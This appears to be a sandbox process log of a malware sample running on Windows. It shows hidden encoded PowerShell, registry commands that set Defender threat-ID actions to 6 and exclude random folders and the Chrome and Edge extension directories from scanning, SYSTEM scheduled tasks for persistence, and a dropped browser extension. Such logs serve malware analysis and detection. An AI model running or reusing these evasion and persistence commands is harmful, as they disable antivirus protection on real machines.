C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5084 -ip 50841⤵PID:3532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1464 -ip 14641⤵PID:4540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5972 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 856 -ip 8561⤵PID:3452
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5356
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5432
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5296
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe id /WZsite_idxpt 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4584
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5456
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5732
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5828 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:5856
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:3400
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:5624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:5892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:5372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:5660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:5588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:4272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:3752
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOoXQPhFC"2⤵PID:4196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOoXQPhFC"2⤵PID:2656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mRaseIvrfxDtBOYKW"2⤵PID:5168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5320 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2096
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:216
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:512
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe Ty /Cisite_idYrv 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5612 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"2⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1484
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5812
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5328
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:3588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:1776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2492
-
-
